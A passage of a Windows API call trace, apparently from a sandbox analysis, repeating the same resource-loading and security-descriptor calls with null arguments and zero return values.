(hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.948] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.948] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.949] LockResource (hResData=0x0) returned 0x0 [0069.949] FreeResource (hResData=0x0) returned 0 [0069.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.949] LockResource (hResData=0x0) returned 0x0 [0069.949] FreeResource (hResData=0x0) returned 0 [0069.949] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.949] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.949] LockResource (hResData=0x0) returned 0x0 [0069.949] FreeResource (hResData=0x0) returned 0 [0069.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.949] LockResource (hResData=0x0) returned 0x0 [0069.949] FreeResource (hResData=0x0) returned 0 [0069.949] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.949] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.949] LockResource (hResData=0x0) returned 0x0 [0069.949] FreeResource (hResData=0x0) returned 0 [0069.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.949] LockResource (hResData=0x0) returned 0x0 [0069.949] FreeResource (hResData=0x0) returned 0 [0069.949] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.949] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.950] LockResource (hResData=0x0) returned 0x0 [0069.950] FreeResource (hResData=0x0) returned 0 [0069.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.951] FreeResource (hResData=0x0) returned 0 [0069.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.951] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.952] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.952] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.952] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.952] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.952] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.952] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.952] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.952] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.952] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.952] LockResource (hResData=0x0) returned 0x0 [0069.952] FreeResource (hResData=0x0) returned 0 [0069.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.953] LockResource (hResData=0x0) returned 0x0 [0069.953] FreeResource (hResData=0x0) returned 0 [0069.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 